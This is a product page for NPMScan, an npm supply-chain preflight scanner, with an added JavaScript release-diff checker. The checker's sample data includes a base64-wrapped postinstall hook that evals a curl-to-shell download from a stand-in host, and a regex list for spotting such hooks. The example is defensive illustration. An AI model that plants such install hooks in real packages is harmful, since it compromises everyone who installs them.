Required Reading
~5 min

Why NPMScan

Fast, blunt, and practical preflight checks for npm packages.

Why we built NPMScan

Too many teams still run npm i blind. Recent npm waves (wallet drainers, typosquats, maintainer takeovers) showed how fast a bad release can slip into CI and ship to prod. We wanted a dead-simple preflight check that catches active malware now, not just CVEs from last year.

What’s different vs. the usual scanners

  • Active malware intel: live feed of malicious packages/campaigns, not just advisory databases.
  • Drainer & takeover heuristics: flags obfuscated postinstall scripts, suspicious maintainer changes, exfil patterns, clipboard/crypto hooks.
  • Zero setup: paste package.json or enter package@version → instant risk snapshot.
  • Release diffing: highlights risky jumps between versions (new install scripts, bins, or dependencies) so you can pin the previous version or skip the release.
  • CI optional: great in-browser; API/CLI if you want gates later.
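A concrete sketch of the release-diffing and install-hook heuristics described in the list above. This is an added example, not NPMScan's own code or rules: the package names, the sample manifests, and the regex heuristics are all constructed for illustration, and the severity thresholds are an assumption about what a blunt preflight gate might do.

```javascript
// Added example: a minimal "release diff" preflight for two package.json
// manifests of the same package. Not NPMScan's code; the manifests below are
// constructed sample data and the heuristics are illustrative (assumed), not
// the product's rules. Run with: node release-diff.js

// Lifecycle scripts npm runs when a package is installed as a dependency.
// ('prepare' only runs for git/local dependencies; included for completeness.)
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Rough obfuscation / exfil tells inside an install hook. Any one match is
// enough to flag; false positives are acceptable for a blunt preflight.
const SUSPICIOUS_PATTERNS = [
  /\beval\s*\(/,                    // eval of a built-up string
  /new\s+Function\s*\(/,            // dynamic code construction
  /\bcurl\b|\bwget\b/i,             // downloads at install time
  /child_process|\bexec\s*\(/,      // spawning shells from a hook
  /[A-Za-z0-9+/]{60,}={0,2}/,       // long base64-looking blob
  /(\\x[0-9a-f]{2}){4,}/i,          // hex-escaped string literal
];

function isSuspicious(cmd) {
  return SUSPICIOUS_PATTERNS.some((re) => re.test(cmd));
}

// package.json "bin" may be a string (one bin named after the package) or a map.
function binMap(pkg) {
  if (!pkg.bin) return {};
  if (typeof pkg.bin === 'string') return { [pkg.name]: pkg.bin };
  return pkg.bin;
}

// Compare two manifests of the same package and return a list of findings.
function diffRelease(oldPkg, newPkg) {
  const findings = [];
  const oldScripts = oldPkg.scripts || {};
  const newScripts = newPkg.scripts || {};

  for (const hook of INSTALL_HOOKS) {
    const cmd = newScripts[hook];
    if (cmd === undefined) continue;
    if (!(hook in oldScripts)) {
      findings.push({ severity: 'high', kind: 'new-install-hook', detail: `${hook}: ${cmd}` });
    } else if (oldScripts[hook] !== cmd) {
      findings.push({ severity: 'medium', kind: 'changed-install-hook', detail: `${hook}: ${cmd}` });
    }
    if (isSuspicious(cmd)) {
      findings.push({ severity: 'high', kind: 'suspicious-install-hook', detail: `${hook}: ${cmd}` });
    }
  }

  const oldBin = binMap(oldPkg);
  for (const name of Object.keys(binMap(newPkg))) {
    if (!(name in oldBin)) findings.push({ severity: 'medium', kind: 'new-bin', detail: name });
  }

  for (const field of ['dependencies', 'optionalDependencies']) {
    const before = oldPkg[field] || {};
    const after = newPkg[field] || {};
    for (const [dep, range] of Object.entries(after)) {
      if (!(dep in before)) {
        findings.push({ severity: 'low', kind: 'new-dependency', detail: `${field}: ${dep}@${range}` });
      }
    }
  }
  return findings;
}

// Blunt decision (assumed policy): any high -> skip the release,
// any medium -> pin and review, otherwise ok.
function verdict(findings) {
  if (findings.some((f) => f.severity === 'high')) return 'skip';
  if (findings.some((f) => f.severity === 'medium')) return 'pin-and-review';
  return 'ok';
}

// Constructed sample: a benign 1.2.3 and a 1.2.4 that grew a base64-wrapped
// postinstall hook, a new bin, and a new dependency. Names are made up.
const PAYLOAD = Buffer.from("require('child_process').exec('curl https://example.invalid/x | sh')").toString('base64');
const OLD_PKG = {
  name: 'tiny-pad',
  version: '1.2.3',
  scripts: { test: 'node test.js' },
  dependencies: { ms: '^2.1.3' },
};
const NEW_PKG = {
  name: 'tiny-pad',
  version: '1.2.4',
  scripts: {
    test: 'node test.js',
    postinstall: `node -e "eval(Buffer.from('${PAYLOAD}','base64').toString())"`,
  },
  bin: { 'tiny-pad-helper': './bin/helper.js' },
  dependencies: { ms: '^2.1.3', 'some-new-dep': '^1.0.0' },
};

const sampleFindings = diffRelease(OLD_PKG, NEW_PKG);
for (const f of sampleFindings) console.log(`[${f.severity}] ${f.kind}: ${f.detail}`);
console.log('verdict:', verdict(sampleFindings));
```

For the sample pair this reports two high findings on the postinstall hook (it is new, and it evals a base64 blob), a medium for the new bin, a low for the new dependency, and a verdict of skip. The same logic generalizes to a lockfile or registry tarball diff once the manifests come from the registry rather than inline objects; the point is that a new or changed install hook between two patch versions deserves a human look before CI pulls it.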

It’s fast, blunt, and practical. No login, no fluff — just “is this safe to install?” in seconds.

No source code required

If you don’t trust anyone (good instinct), don’t upload your repo — just share package.json.

No installs, no extensions

You don’t need to install anything. Even VS Code extensions can touch env vars or run scripts; NPMScan runs in your browser, read-only.

One-page context you usually click around for

See latest commits, open issues, and maintainer info for each package on a single page. On GitHub you’d bounce between tabs; here it’s consolidated.

Trust but verify

We show the raw facts (commits/issues/maintainers/scripts/diffs) so you can do your own analysis if you don’t want to rely on ours.

Roadmap (tell us what to prioritize)

  • GitHub App PR comments
  • Lockfile diff guard
  • VS Code extension (strictly read-only)
  • Private registry proxy with policy
  • SBOM export + API

We’re a team focused on practical supply‑chain safety. Tell us what would help your workflows most.